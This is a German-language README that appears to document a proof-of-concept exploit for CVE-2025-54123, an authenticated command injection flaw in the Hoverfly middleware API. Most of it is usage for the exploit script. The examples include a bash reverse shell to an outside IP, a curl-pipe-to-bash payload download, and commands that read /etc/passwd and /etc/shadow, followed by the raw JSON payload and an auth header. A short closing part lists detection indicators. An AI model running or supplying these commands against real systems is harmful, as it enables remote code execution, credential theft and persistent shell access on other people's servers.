
CVE-2025-54123 Hoverfly Authentifizierte Middleware Befehlsinjektion RCE
Hoverfly Authenticated Middleware Command Injection RCE | CVSS 9.8 KRITISCH
Hoverfly <= 1.11.3 ist anfällig für authentifizierte Befehlseinschleusung über den /api/v2/hoverfly/middleware-Endpunkt. Administrator-Anmeldedaten sind erforderlich, aber nach der Authentifizierung akzeptiert die Middleware-Funktionalität vom Benutzer bereitgestellte Binär- und Skriptwerte ohne Validierung, was die Ausführung beliebiger Befehle ermöglicht.
middleware.go akzeptiert beliebige Binärpfadelocal_middleware.go übergibt Benutzereingaben direkt an exec.Command()hoverfly_service.go führt die Middleware während der Validierung auspython3 exploit.py -t <ZIEL_URL> -u <BENUTZERNAME> -p <PASSWORT> -c <BEFEHL> [--shell SHELL]
-t, --target – Hoverfly-API-Endpunkt (erforderlich)-u, --username – Administrator-Benutzername (erforderlich)-p, --password – Administrator-Passwort (erforderlich)-c, --command – Auszuführender Befehl (erforderlich)--shell – Zu verwendende Shell-Binärdatei (Standard: /bin/bash)# Grundlegende Befehlsausführung
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami
# Sensitive Dateien lesen
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"
# Reverse Shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
# Mehrfachbefehlsausführung
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"
# Andere Shell verwenden
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh
# Payload herunterladen und ausführen
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"
/api/v2/hoverfly/middleware mit bösartigem Payload/tmp/hoverfly_<zufall><shell> /tmp/hoverfly_<zufall>{
"binary": "/bin/bash",
"script": "whoami"
}
HTTP-Header enthalten:
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json
core/middleware/middleware.go:94-96 – Keine Eingabevalidierung für binären Parametercore/middleware/local_middleware.go:14-19 – Unsichere Verwendung von exec.Command()core/hoverfly_service.go:173 – Sofortige Ausführung während der ValidierungAchten Sie auf:
/api/v2/hoverfly/middleware/tmp/hoverfly//api/v2/hoverfly/middleware-Endpunkt überwachenUrsprüngliche Entdeckung: @Kr1shna4garwal